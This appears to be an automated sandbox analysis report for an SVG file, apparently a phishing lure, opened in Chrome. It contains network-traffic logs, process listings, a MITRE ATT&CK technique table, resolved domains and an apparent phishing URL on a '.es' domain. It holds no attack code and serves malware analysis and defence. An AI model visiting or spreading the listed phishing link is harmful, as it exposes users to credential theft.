              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49677
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownHTTPS traffic detected: 172.67.206.88:443 -> 192.168.2.17:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.88:443 -> 192.168.2.17:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.88:443 -> 192.168.2.17:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.17:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.17:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.17:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.17:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.17:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.17:49936 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6540_391875336
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6540_391875336
              Source: classification engineClassification label: mal72.phis.winSVG@19/4@44/138
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\SCANNE~1.SVG
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,17268801680019511829,17547210441638238373,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2060 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,17268801680019511829,17547210441638238373,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2060 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Extra Window Memory Injection
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              File Deletion
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Extra Window Memory Injection
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
              Ingress Tool Transfer
              Traffic DuplicationData Destruction

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://wtlo2.vtjgyhvuo.es/RGMO6oRV/0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              code.jquery.com
              151.101.194.137
              truefalse
                high
                developers.cloudflare.com
                104.16.5.189
                truefalse
                  high
                  cdnjs.cloudflare.com
                  104.17.25.14
                  truefalse
                    high
                    beacons-handoff.gcp.gvt2.com
                    142.250.113.94
                    truefalse
                      high
                      gce-beacons.gcp.gvt2.com
                      35.241.20.48
                      truefalse
                        high
                        www.google.com
                        142.251.40.164
                        truefalse
                          high
                          beacons2.gvt2.com
                          142.251.222.3
                          truefalse
                            high
                            beacons.gvt2.com
                            142.250.138.94
                            truefalse
                              high
                              wtlo2.vtjgyhvuo.es
                              172.67.206.88
                              truefalse
                                unknown
                                e2c47.gcp.gvt2.com
                                35.206.80.10
                                truefalse
                                  unknown
                                  beacons.gcp.gvt2.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://otelrules.svc.static.microsoft/rules/rule701151v1s19.xmlfalse
                                      high
                                      https://otelrules.svc.static.microsoft/rules/rule704001v0s19.xmlfalse
                                        high
                                        https://otelrules.svc.static.microsoft/rules/rule702151v1s19.xmlfalse
                                          high
                                          https://otelrules.svc.static.microsoft/rules/rule700151v1s19.xmlfalse
                                            high
                                            https://otelrules.svc.static.microsoft/rules/rule703151v1s19.xmlfalse
                                              high
                                              https://otelrules.svc.static.microsoft/rules/rule120630v0s19.xmlfalse
                                                high
                                                https://otelrules.svc.static.microsoft/rules/rule120645v0s19.xmlfalse
                                                  high
                                                  https://otelrules.svc.static.microsoft/rules/rule700001v2s19.xmlfalse
                                                    high
                                                    https://otelrules.svc.static.microsoft/rules/rule701751v1s19.xmlfalse
                                                      high
                                                      https://otelrules.svc.static.microsoft/rules/rule120663v0s19.xmlfalse
                                                        high
                                                        https://otelrules.svc.static.microsoft/rules/rule701301v1s19.xmlfalse
                                                          high
                                                          https://otelrules.svc.static.microsoft/rules/rule702751v1s19.xmlfalse
                                                            high
                                                            https://otelrules.svc.static.microsoft/rules/rule702301v1s19.xmlfalse
                                                              high
                                                              https://otelrules.svc.static.microsoft/rules/rule120609v0s19.xmlfalse
                                                                high
                                                                https://otelrules.svc.static.microsoft/rules/rule120627v0s19.xmlfalse
                                                                  high
                                                                  https://otelrules.svc.static.microsoft/rules/rule703601v0s19.xmlfalse
                                                                    high
                                                                    https://otelrules.svc.static.microsoft/rules/rule700751v1s19.xmlfalse
                                                                      high
                                                                      https://otelrules.svc.static.microsoft/rules/rule700301v1s19.xmlfalse
                                                                        high
                                                                        https://otelrules.svc.static.microsoft/rules/rule701550v1s19.xmlfalse
                                                                          high
                                                                          https://otelrules.svc.static.microsoft/rules/rule700100v1s19.xmlfalse
                                                                            high
                                                                            https://otelrules.svc.static.microsoft/rules/rule702550v1s19.xmlfalse
                                                                              high
                                                                              https://otelrules.svc.static.microsoft/rules/rule700550v1s19.xmlfalse
                                                                                high
                                                                                https://otelrules.svc.static.microsoft/rules/rule703400v0s19.xmlfalse
                                                                                  high
                                                                                  https://otelrules.svc.static.microsoft/rules/rule700901v1s19.xmlfalse
                                                                                    high
                                                                                    https://otelrules.svc.static.microsoft/rules/rule701100v1s19.xmlfalse
                                                                                      high
                                                                                      https://otelrules.svc.static.microsoft/rules/rule700400v2s19.xmlfalse
                                                                                        high
                                                                                        https://otelrules.svc.static.microsoft/rules/rule701901v1s19.xmlfalse
                                                                                          high
                                                                                          https://otelrules.svc.static.microsoft/rules/rule120635v0s19.xmlfalse
                                                                                            high
                                                                                            https://otelrules.svc.static.microsoft/rules/rule703850v0s19.xmlfalse
                                                                                              high
                                                                                              https://otelrules.svc.static.microsoft/rules/rule702901v1s19.xmlfalse
                                                                                                high
                                                                                                https://otelrules.svc.static.microsoft/rules/rule120612v0s19.xmlfalse
                                                                                                  high
                                                                                                  https://otelrules.svc.static.microsoft/rules/rule703000v1s19.xmlfalse
                                                                                                    high
                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120681v0s19.xmlfalse
                                                                                                      high
                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120640v0s19.xmlfalse
                                                                                                        high
